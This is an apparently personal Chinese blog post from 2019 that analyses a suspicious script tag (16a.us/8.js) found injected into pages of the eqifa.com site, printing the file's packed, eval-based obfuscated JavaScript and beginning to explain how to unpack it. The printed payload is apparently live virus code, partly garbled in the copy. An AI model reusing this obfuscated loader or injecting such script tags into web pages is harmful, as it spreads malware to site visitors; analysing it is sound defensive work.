由亿起发(eqifa.com)的页面发现顶部的http://16a.us/8.js想到的js解密
2019年07月21日
今天访问eqifa的官方网站,发现好多页面都带有 <script src=http://16a.us/8.js></script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
找了资料,有可能是arp欺骗导致的或真的页面都被加了代码,这个代码是病毒,我来分析下,到了最后的时候发现js是16进制的,这次是实战,每一部都会很清晰,学不会教学费 呵呵
第一部,得到代码 (因为是知道js文件可以直接用ie打开访问)
代码如下
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p}('15("Anosr4a7jD9q74vahbOco9qB7NDqaAnDjna499n9w12sao7qnahgQ947s9a679s4iPO�Xco9qB7NbgiUTAnosr4a7jD9q74vahbOco9qB7NbgiUTAnosr4a7jD9q74vahb12sao7qna6Walchag6Q6Fk96asrH49lc6w6lk7Ij9kaAnrhg14ai6947s9a6�C��18y��1d5��12d��12m��18u�CJlk7Ij9nsaAhasrH49lcgJ�C��1fy��185��12m��18u�Ci6P679V6Q6mnDa119vw�C��12G��185��185��18u��13M��1fe��1fe��13p��132��12p��1fy��18d��183��1fe��12e��15K��15K��1fe��183��12m��183��183��1fy��12d��18G��12d�Ci6Fk96lcmewAnosr4a7jo94k74yv4r4a7h�b��12e��12f��12M��12d��123��185�bgi6lcmejc47M779qHs74h�b��123��12z��12p��183��183��12t��125�bx�b��123��12z��183��12t��125��13M��15f��155��13t��132��153��13d��13d��132��1fm��132��13d��15p��133��1fm��13p��13p��155��13u��1fm��13t��13G��133��15p��1fm��13u��13u��153��13u��135��152��153��13f��13t��15d��133��132�bgi6Fk961wlcmejz94k74LHS4o7h�b��15m��12t��123��18f��12e��183��12e��122��185��1fy��1dG�bJ�b��15m��15z��15G��1d5��1d5��1du�bx�b�bgi6Fk96Ewlcmejz94k74LHS4o7h�b��15p��125��12e��125��12f��1fy��1d3��185��18f��12d��12p��12m�bx�b�bgi6Ej7VB4wpi61jnB4ah�b��158��15d��1d5�bx6mnDa119vxugi61jc4aAhgi6lceakr4pwWalchttttgi6Fk96ewlcmejz94k74LHS4o7h�b��1d3��123��18f��12t��18u��185��12t��12y��128��1fy��152��12t��12z��12d��1d3��18t��183��185��12d��12m��15e��12f��12M��12d��123��185�bx�b�bgi6Fk96lcRrBwejW47EB4oqkvenvA49hugi6lceakr4pw6ejKsqvA10k7IhlcRrBxlceakr4pgi6EjLB4ahgiEj139q74h1j94cBnac4KnAVgi6EjEkF4Rneqv4hlceakr4pxfgi6Ejzvnc4hgi6Fk96lcZwlcmejz94k74LHS4o7h�b��1d3��12G��12d��12z��12z��1fy��15p��18u��18u��12z��12t��123��12p��185��12t��12e��12y�bx�b�bgi6mnDapwejKsqvA10k7IhlcRrBJ�C��1dz��1dz��183��18t��183��185��12d��12m��133��13f�Cx�C��123��12m��125��1fy��12d��18G��12d�Cgi6lcZjEI4vvy14os74hmnDapx�C��1fu��1fe��1236�CJlceakr4px�b�bx�b��12e��18u��12d��12y�bxugi6P6ok7oIhlcYg6Q6lcYwpi6PbgiUTAnosr4a7jD9q74vahbO�Xco9qB7Nbg")',62,68,'x5C|x78|x36|x33|x65|x34|x20|x74|x37|x72|x6E|x22|x73|x35|x46|x32|x29|x28|x3B|x2E|x61|x4D|x44|x6F|x63|x31|x69|x6D|x75|x39|x30|x6C|x3D|x2C|x45|x43|x64|x70|x27|x77|x53|x76|x38|x62|x68|x2B|x42|x4F|x41|x3E|x3C|x7D|x7B|x54|x6A|x0A|x0D|x79|x47|x2F|x49|x51|x50|x55|x66|x57|x2A|eval'.split('|'),0,{}))
这是压缩,说是加密有问题,以后我说是加密也是可以理解的
解密方法如下,我是从blueidea的return 方法动手脚
return p改成thes.value=p
